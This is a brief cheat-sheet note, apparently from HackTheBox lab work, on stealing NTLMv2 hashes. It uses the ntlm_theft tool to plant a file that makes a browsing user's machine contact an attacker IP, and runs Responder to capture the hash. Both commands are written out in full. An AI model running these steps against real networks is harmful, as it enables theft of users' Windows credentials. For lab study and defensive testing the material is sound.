NTLM Hash Theft

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

You can drop a file somewhere in the filesystem (for example a network share). If the user browses to the directory where that file is, then the file will automatically create a network request to your computer (which is running Responder and will capture the NTLM hash).

Generating the file:

python3 ntlm_theft.py --generate url --server 10.10.14.42 --filename somefilename

Run responder like this (choose the correct interface. In this case it's tun0 for hackthebox):

sudo responder -I tun0 --analyze